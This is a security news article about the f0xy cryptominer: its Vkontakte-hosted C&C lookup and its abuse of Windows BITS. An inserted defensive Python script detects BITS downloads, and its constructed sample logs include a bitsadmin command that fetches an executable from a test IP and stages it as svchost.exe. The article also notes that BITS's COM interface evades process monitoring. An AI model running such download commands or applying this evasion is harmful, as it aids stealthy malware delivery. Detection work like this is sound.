
New “F0xy” Malware Uses Clever Techniques to Stay Hidden

New Malware Downloads Cryptocurrency Miner to Infected Devices

Researchers at Websense have come across a new piece of malware that leverages legitimate websites and services in an effort to disguise its malicious activities.

The threat has been dubbed “f0xy” not only because it is cunning like a fox, but also because this particular string has been found in its executables and in the registry keys it creates for persistence.

The earliest samples identified by researchers are dated January 13, 2015, but the malware has been enhanced by its creators since. Initial variants only worked on Windows Vista and later versions of Microsoft’s operating system, but newer variants also work on Windows XP, Websense said.

The initial dropper was detected by only 5 of the antivirus engines on VirusTotal when it was analyzed by Websense. The detection rate has increased since, but it’s still fairly low.

According to researchers, the developers of f0xy chose not to obfuscate the malware’s code, most likely in an effort to make it look more legitimate and avoid raising suspicion.

Another method used to hide the presence of the threat involves the Russian social media website Vkontakte. The malware contains an encoded string that hides a URL pointing to a specific Vkontakte profile. An encoded string posted as a comment on that profile in turn contains the URL of the command and control (C&C) server used by the malware.

Once the f0xy downloader finds itself on a computer, it leverages the Microsoft Background Intelligent Transfer Service (BITS) to download its payload. BITS is designed for transferring files between a client and a server using idle network bandwidth. The component is leveraged by services like Windows Defender and Windows Update.

“Presumably the main reason for using BITS is to prevent security products from flagging its behavior as suspicious, because anti-malware solutions are much less likely to have a problem with bitsadmin.exe performing network requests than an unknown executable,” Websense researcher Nick Griffin wrote in a blog post.

In this case, the malware calls the bitsadmin executable directly to specify the parameters for the file transfer (the source and destination of the file). However, experts have pointed out that the transfer can be made even stealthier by interacting with BITS through its Component Object Model (COM) interface, since that route does not launch a separate bitsadmin.exe process for monitoring tools to notice.
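The two ways of driving BITS described above leave different traces for a defender: a bitsadmin.exe invocation shows up as a process creation, while a COM-created job never spawns that process and is only visible in the BITS client’s own operational log. The following Python script is an added example, not code from Websense or from the article, that runs both checks over a handful of constructed log records. The record layout (simplified Sysmon Event ID 1 fields and a Microsoft-Windows-Bits-Client Event ID 59 “transfer job started” record carrying the job URL), the allowlist of expected download hosts and the user-writable path markers are all assumptions for the example.

```python
"""Flag BITS-based download activity in constructed Windows log records.

Two vantage points are needed because the two ways of using BITS differ:
  * process creation (modelled on Sysmon Event ID 1): catches bitsadmin.exe
    invoked with transfer-related switches, the route f0xy takes;
  * the BITS client's operational log (modelled on Microsoft-Windows-Bits-Client
    Event ID 59, which names the job and its URL): catches jobs created through
    the COM interface, which never start a bitsadmin.exe process.
All record layouts, allowlists and sample values below are assumptions.
"""
from urllib.parse import urlparse

# bitsadmin switches that create or feed a transfer job (real bitsadmin options).
BITSADMIN_TRANSFER_SWITCHES = {"/transfer", "/addfile", "/create", "/resume", "/setnotifycmdline"}

# Hosts a BITS job is expected to reach on a managed client (assumed allowlist).
EXPECTED_BITS_HOSTS = ("windowsupdate.com", "microsoft.com", "update.example.corp")

# Path fragments that suggest a payload is being staged rather than a patch applied.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")

# Constructed sample records: one f0xy-style download, two benign admin uses,
# one genuine update job and one COM-created job fetching a non-update binary.
SAMPLE_EVENTS = [
    {"source": "Sysmon", "event_id": 1, "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Users\alice\AppData\Local\Temp\dropper.exe",
     "command_line": r"bitsadmin.exe /transfer upd /download /priority normal "
                     r"http://203.0.113.10/m.exe C:\Users\alice\AppData\Roaming\svchost.exe"},
    {"source": "Sysmon", "event_id": 1, "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "bitsadmin /list /allusers"},
    {"source": "Sysmon", "event_id": 1, "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"bitsadmin.exe /transfer kb /download /priority high "
                     r"https://update.example.corp/kb.msu C:\patches\kb.msu"},
    {"source": "Bits-Client", "event_id": 59, "job_name": "Windows Update",
     "url": "https://download.windowsupdate.com/c/msdownload/x.cab"},
    {"source": "Bits-Client", "event_id": 59, "job_name": "upd",
     "url": "http://203.0.113.10/miner64.exe"},
]


def host_is_expected(url: str) -> bool:
    """True when the URL's host is (a subdomain of) an allowlisted download host."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in EXPECTED_BITS_HOSTS)


def in_user_writable_location(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE_MARKERS)


def check_process_event(event: dict) -> list:
    """Rules for a bitsadmin.exe process-creation record."""
    findings = []
    if not event.get("image", "").lower().endswith("\\bitsadmin.exe"):
        return findings
    tokens = event.get("command_line", "").split()
    switches = {t.lower() for t in tokens if t.startswith("/")}
    if not switches & BITSADMIN_TRANSFER_SWITCHES:
        return findings  # e.g. "bitsadmin /list" from an administrator
    urls = [t for t in tokens if t.lower().startswith(("http://", "https://"))]
    for url in urls:
        if not host_is_expected(url):
            findings.append({"rule": "bitsadmin_unexpected_source", "detail": url})
    for token in tokens:
        if token not in urls and in_user_writable_location(token):
            findings.append({"rule": "bitsadmin_user_writable_destination", "detail": token})
    parent = event.get("parent_image", "")
    if in_user_writable_location(parent):
        findings.append({"rule": "bitsadmin_unusual_parent", "detail": parent})
    return findings


def check_bits_client_event(event: dict) -> list:
    """Rule for a BITS client 'job started' record; covers COM-created jobs too."""
    url = event.get("url", "")
    if event.get("event_id") == 59 and url and not host_is_expected(url):
        return [{"rule": "bits_job_unexpected_url",
                 "detail": f"{event.get('job_name', '?')} -> {url}"}]
    return []


def analyze(events: list) -> list:
    """Run the matching rule set over each record and collect findings."""
    findings = []
    for event in events:
        if event.get("source") == "Sysmon" and event.get("event_id") == 1:
            findings.extend(check_process_event(event))
        elif event.get("source") == "Bits-Client":
            findings.extend(check_bits_client_event(event))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"{finding['rule']:40} {finding['detail']}")
```

On the sample records the first bitsadmin invocation trips three rules (non-allowlisted source, destination under AppData, parent process running from a temp directory), the two administrator uses trip none, and the COM-style job is caught only by the BITS client log rule. The practical caveat is the one the article hints at: the process-creation vantage point alone misses COM-driven transfers, so the Microsoft-Windows-Bits-Client operational log has to be collected for the second rule to have anything to inspect.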

The payload spotted by Websense is a 64-bit version of CPUMiner, a popular open source cryptocurrency mining application. The attackers configure the miner to use a mining pool so that all the virtual currency mined by the infected machines goes to them.

“It is clear that financial motivations remain at the forefront of cybercriminal minds, with the anonymity of cryptocurrency providing a somewhat safer route for collecting the spoils,” Griffin said. “We also expect to see a continuing growth of malware authors migrating to legitimate and reputable websites, to hide their malicious activities, and we expect plenty more evasion tactics adopted as authors continue to subvert security products.”

Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
